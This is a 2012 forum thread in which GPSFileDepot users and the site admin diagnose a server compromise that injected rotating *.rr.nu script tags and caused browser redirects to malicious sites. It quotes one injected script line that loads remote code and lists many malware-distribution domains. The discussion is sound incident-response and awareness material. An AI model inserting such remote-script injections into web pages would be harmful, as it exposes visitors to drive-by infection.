Is there another issue with the name server again? Starting yesterday I started getting messages like this whenever I tried to access this site (no problems on any other sites):
Malicious Web Site Blocked
You attempted to access:
http://www3.thebesttuchecker.de.lv/?p3ma=lKjWxbGdm5KbmeDnspCai9ff0a%2BlZJ%2BW1ZzKksqkpJg%3D
This is a known malicious web site. It is recommended that you do NOT visit this site. The detailed report explains the security risks on this site.
For your protection, this web site has been blocked. Visit Symantec to learn more about phishing and internet security.
So I went and tried my laptop and the same thing would happen (and it only happened on this site.
It was still happening today on both computers execpt I would get messagres like
sweepstakesandcontestsdo.com
Oops! Internet Explorer could not connect to astre09atyqr.rr.nu
I emailed some others to see if they were having problems and they said they were not. Now it is an intermittent problem. I've tried what worked when it happened before, but it still keeps happening.
I'm running IE9 on both computers.
Quote from: jbensman on March 01, 2012, 06:34:21 PM
Is there another issue with the name server again? Starting yesterday I started getting messages like this whenever I tried to access this site (no problems on any other sites):
None that I've seen.
Have you checked for the DNS virus?
I think there is a link to check your system here: http://dns-ok.us/
I tried it and it said I do not have it.
It only happens on this site and it has not happened for a while now. Yesterday every time I would go to the site, Norton would give me a warning.
I was also being told by Norton that I was trying to be redirected to a malicious site when trying to access GPSFileDepot's website. Here is a screen shot of what I was seeing with my PC info. blackened out. This was only happening to me on Wed. 2-29-12 and only on GPSFileDepot's site. I updated and ran Norton Antivirus and a malware program and nothing showed up and was still trying to be redirected.
(http://inlinethumb07.webshots.com/49286/2723055240105013954S600x600Q85.jpg) (http://entertainment.webshots.com/photo/2723055240105013954qABeMc)
So how are you both getting past the redirect?
That is what I was getting too. But as I mentioned I was getting the Norton warning up to this afternoon. Then it started redirecting to other places. Now it seems to be working.
its happening again
Starting yesterday morning, after less than a second on the gpsfiledepot webpage, a sex scandel webpage appears. I blocked it and all was OK the rest of the day. This morning it is back with a different URL. This is not happening on other websites we visit. i remember we had some similiar 1-1/2? years ago.
Hah - I also got the re-direct to some sex site yesterday when I tried to open the gpsfiledepot forums. I tried a second time and then it was ok. Weird.
I cannot access the site using Internet Explorer. My previous message where I said it was happening again I was able to cut and paste before Norton blocked the redirect. I am on firefox now and I am not having any trouble, Just before opening firefox, IE blocked me. So has the site been hacked or what the heck is going on?
Confirming it's an IE thing. When I typed "www.gpsfiledepot.com" into IE I got Paris Hilton in her underwear. Firefox (my normal browser) works just fine. The second time I tried it with IE I got the Kaimedia Hawaii site that I got the last time this happened.
Deleted my browsing history (per jbensman's suggestions from the first time this happened, above) and now gpsfiledepot works in both IE and Firefox,
When I load this page (this thread in the forum), my anti-virus blocks a script from running. Looking at the source code for this page, the script is at the very bottom of the HTML for this page. The script that my anti-virus doesn't like is:
ligen92tcusto.rr.nu/nl.php?p=d
Could this be the source of your problem? Is there a purpose to that script being called from this page? Anyone want to go hunting and try to figure out if that script is really bad or if my anti-virus software is just over-reacting?
BTW, I never get redirected and never have had trouble loading the forum or the main part of the site.
Dave
I just loged in again, and now it is referencing another URL.
I would say something in the our webpage, or perhaps the entire web service provider.
Over the last week, I have been redirected a couple of times to a 'ransomware site', as I have tried to get to the GpsFileDepot using Internet Explorer. It doesn't happen when accessing other sites, only this one.
I'm guessing the previous post is correct. This site has been infiltrated by malware it seems.
Yes, I did a little searching and the problem is definitely the rr.nu script. There is a known malware / virus infection that inserts script references to random *.rr.nu pages at the bottom of HTML pages of infected websites / web servers. The script creates a redirect via browser security holes - exactly the problem we're seeing here. I'm not sure if this is a problem that falls to Oz to fix or to his webhost.
The reason that not all of us see the problem is that the problem can be blocked with up-to-date browser updates (like Microsoft security patches) and up-to-date anti-virus software. Perhaps the exploit only works on certain browsers, also.
Bottom line, the problem is on this website, not your machine - unless when the script runs it infects your machine with a virus...that could be possible.
Dave
Quote from: dbperry on March 02, 2012, 08:54:45 AM
Bottom line, the problem is on this website, not your machine - unless when the script runs it infects your machine with a virus...that could be possible.
Not sure this explains why the problem went away when I deleted my browsing history. Is it possible that browsing history can be infected?
I just deleted my browsing history and temp files. I then tried the site again with IE9and I got redirected.
Is there any danger in downloading the maps?
Something is definitely wrong here. Normally I use Firefox 7.01 on Windows. Am not getting the redirect there now. I tried IE 7 just now (which I never really use) and the site is ok there too.
So I tried Safari 5.1.3 on MacOS X, and my usual link to the forum - http://forums.gpsfiledepot.com/ just redirected me to the Russian site. Now it is working normally again.
If I look at the "activity" window in Safari, there is an entry for
http://rmore79riveru.rr.nu/nl.php?p=d
Googling this, I see that this may be malware infecting the forum software: http://pastebin.com/wKkNk7n6
I'm going to use the "report to moderator" button to make sure that Oz and Indrid are aware of this.
Would Anti-Virus/Firewall matter?
I'm using BitDefender.
Also, jbensman, when I deleted my browsing history I had "Preserve Favorites Website Data" unchecked.
Safari has an "activity" window that shows everything happening when you open a page. On almost every page I access, there are php scripts being executed on some foreign site. Right now I see one for http://astre09atyqr.rr.nu/nl.php?p=d
If I go to the forum homepage there's a link to http://asin54grepl.rr.nu/nl.php?p=d
If I do it again then it's http://ionbr82eastna.rr.nu/nl.php?p=d
There seem to be a large number of permutations of similar links. I don't see these listed in Firefox on Windows, so maybe they are being blocked. But something must be infected somewhere on the site...
Googling around some more., I found these:
http://webmasters.stackexchange.com/questions/26475/is-someone-hijacking-my-site
http://www.google.vu/support/forum/p/Webmasters/thread?tid=0c8c5f8c216cc9bd&hl=en
QuoteThis line of code at the end of the homepage.
< sc ript src="http://ionis90landsi.rr.nu/nl.php?p=d"> < / sc ript >
From what I have seen this hack always includes a backdoor on the site.
I have reuploaded original files from my computer however I am not sure how the exploit occurred since the pages are custom code (not wordpress or anything).
Passwords have been changed in case that was the exploit.
The site was definitely hijacked on the night of the 28th (not sure how I missed this thread). I never noticed because I use Chrome.
However the backdoor still seems to be there which means the exploit is loaded in real time at the host.
I am still getting the redirect in Internet Explorer. I tried deleting history, temp files, and files.
wish I could help here but I'm not getting anything out of the usual.
Eaparks emailed me this:
The hack/being redirected is back again, at least for me. I'm not able to access GPSFileDepot, I'm being redirected to a site address called "rmore79riveru.rr.nu" (194.28.114.103.80).
I can just briefly see that there have been several post in the Download thread on GPSFileDeopt on the home page but I am redirected and blocked by Norton so I unable to see what everyone is saying about this. If you are able to get on GPSFileDepot your welcome to say I'm unable to access the website if it will help in the discussion going on. If there is a solution being discussed please advise me since I'm unable to participate in the discussion.
Thanks
Ed
http://www.magic-net.info/blacklist_lookup/2012/194.28.114.103%20Blacklist%20lookup%20February%2029%202012.html
Quote from: Indrid Cold on March 02, 2012, 12:38:17 PM
wish I could help here but I'm not getting anything out of the usual.
You have a Mac, right? In Safari go Window > Activity then go to http://forums.gpsfiledepot.com/ and observe what happens. Hit refresh, and every time you do a different but similar url is embedded - here are two screenshots.
Quote from: Boyd on March 02, 2012, 02:26:44 PM
You have a Mac, right?
I might have a dozen or so Macs as well as them others...
Will give it a look when I get a chance, Safari seems to be working OK on the iPhone. NO cheesecake for me:(
FYI... when I started up my computer this morning I once again was redirected to http://myustreamtv.rr.nu/2f/
And using safari, I still see activity from url's such as http://sbulle06tsconti.rr.nu/nl.php?p=d
The redirect only happened the first time, but those URL's are embedded in the activity on every page.
Quote from: -Oz- on March 02, 2012, 11:39:32 AM
However the backdoor still seems to be there which means the exploit is loaded in real time at the host.
Yes, it appears that the link to the *.rr.nu script is loaded dynamically. That is why the subdomain (part of the web address before .rr.nu) is always different. I also wonder if that is why the redirect only happens sometimes - I wonder if sometimes, the dynamically loaded script is actually broken, so it doesn't redirect. That could explain the random / intermittent nature of the redirect that some people experience.
Oz, have you engaged / contacted your webhost? This is clearly at least somewhat their problem, not necessarily yours. What say they?
P.S. For me, Google Chrome (on Windows 7) appears to work OK, even with my anti-virus turned off. You may want to try that to access the site without problems. Deleting history, temp files, etc. probably won't fix the problem for you if you are having the redirect problem (since the problem really isn't on your computer), but either using a different browser or updating your anti-virus (so that it can block the script from running) might help.
Another work around that worked for me is to put "gpsfiledepot.com" in your 'restricted sites' list in Internet Explorer. Then IE will block the script from running and IE will access the site without the redirect. You might not be able to download or upload files with gpsfiledepot in your restricted sites list, but at least you would be able to get to this forum to find out when the problem gets fixed.
Dave
I would suggest until this gets fixed, put some simple hrml at gpsfiledepot.com stating the site has been hacked and the problem is being worked on, then give a link to the site and let people know which browsers work.
I wonder if I could pull that off based on browser. This exploit appears to be based on php itself.
Here's a wikipedia page on "SQL injection" which seems to be what is happening: http://en.wikipedia.org/wiki/SQL_injection
Also, look at this post from just a few days ago. Their site seems to be suffering from the exact same thing - also getting redirected to myustreamtv.rr.nu as we are here:
http://www.htmlforums.com/website-review/t-need-help-146029.html
Quote from: Boyd on March 02, 2012, 02:26:44 PM
You have a Mac, right? In Safari go Window > Activity then go to http://forums.gpsfiledepot.com/ and observe what happens. Hit refresh, and every time you do a different but similar url is embedded - here are two screenshots.
I tried that and struck out, nothing in the Activity window. Lot's of refreshing....
I'll have to take a laptop offsite to Starbucks later and mess with the settings.
Been having the same attack/redirect problem for gpsfiledepot.com for the past 3 days. I used Norton Internet Security's Safe Web facility and it returned a 'green' site access -- no problems, but when I try to access the site through IE8, I get rerouted. Using Firefox the website is accessible and have never been redirected using this browser. Norton Customer Support basically said it was an IE problem.
Within the past hour or so, I have been able to access the gpsfiledepot.com site with IE. Not sure if this is only temporary or someone has found and disabled the culprit.
Thanks for your continued support.
I believe it has been fixed. Not seeing it anymore; found a script that cleaned everything out.
Quote from: Indrid Cold on March 03, 2012, 02:44:32 PMI tried that and struck out, nothing in the Activity window.
Yep, it's gone now. Nice work Dan! :)
Quote from: Boyd on March 03, 2012, 04:14:39 PM
Quote from: Indrid Cold on March 03, 2012, 02:44:32 PMI tried that and struck out, nothing in the Activity window.
Yep, it's gone now. Nice work Dan! :)
Turns out I had java-script off so I wasn't redirected.
Yes it is now fixed. Way to go and what a jerk it was that hacked us! Any idea on how it happened?
Still working on how it happened but it was either through the forums or via the map/article writing script.
The three URLs I restricted had .de.lv extensions.
I wonder if it is safe to download map files now???
I don't think that was ever an issue, from what I saw. I don't believe this was a virus that could infect your own computer, it was an exploit infecting the web server that hosts gpsfiledepot. As far as I could tell, it only attempted to redirect you to a completely unrelated website (see links above) by embedding links to that site in the web page.
I don't see how that could affect a file that you download from GPSFileDepot.
That is good to hear. I was afraid to open those exec files.
As always, you should keep your anti virus software up to date. :)
Yes, the .exe files were not modified. It could only embed in the web pages itself.
Looks like the culprit script is back. Tried to access the GPSFileDepot site from IE and again get rerouted.
Access from Firefox is OK
DAMN.... I'm afraid you're right. I was just redirected to http://ustreamtvonline.rr.nu/2f/
Using the activity monitor in Safari, I once again see the same embedded links on GPSFileDepot pages...
When I tried to log in the first time I was re-directed to a site that helpfully informed me I had lots of viruses. It's domain ended in .de . Second IE login worked OK. Then when I tried to post this message in IE I got repeated "page timed out" messages. I'm sending it from Firefox.
IE Not working Firefox is
Grr, running the cleaner now. I have to think the exploit is in the forums because I can't get to certain pages around here. Looks like the forums will have to get a clean install.
Fixed again. It left behind a backdoor in the map upload part of the site that I missed. That has been removed now too.
test
I was not able to post on the forums (got times out) not send emails, messages or log out on IE or Firefox. I tried clearing cache and history and still nothing. I shut down IE and restarted it. It then allowed me to log off and log back in. It seems to be working now.
Those symptoms (the login/logout/register) all occurred while I was changing security settings. It broke some of the session data so until the browser cache was cleared there were anomoloies. Hopefully all the backdoors were found but I still may need to do major work on the forum software since it isn't custom builts.
This might be worrisome... a trojan named BackDoor.Flashback.39 has gotten a lot of coverage recently because it can infect Macs: http://news.yahoo.com/more-600-000-macs-infected-flashback-malware-report-091608469.html
This is what caught my eye though. Look at some of the websites that are spreading this virus. They include the sites that we were being redirected to when GPSFileDepot was hacked. I guess I need to take a closer look at my Mac to see if it's been compromised. >:(
http://news.drweb.com/show/?i=2341&lng=en&c=14
QuoteSystems get infected with BackDoor.Flashback.39 after a user is redirected to a bogus site from a compromised resource or via a traffic distribution system. JavaScript code is used to load a Java-applet containing an exploit. Doctor Web's virus analysts discovered a large number of web-sites containing the code. The recently discovered ones include:
godofwar3.rr.nu
ironmanvideo.rr.nu
killaoftime.rr.nu
gangstasparadise.rr.nu
mystreamvideo.rr.nu
bestustreamtv.rr.nu
ustreambesttv.rr.nu
ustreamtvonline.rr.nu
ustream-tv.rr.nu
ustream.rr.nu
I hope it hasn't been compromized. The kicker is that this is how lots of windows machines get infected (through Java). While I was deployed my media center got infected through Java which was super ridiculous because it rarely browses the internet. Java and flash are becoming the bane of my existence.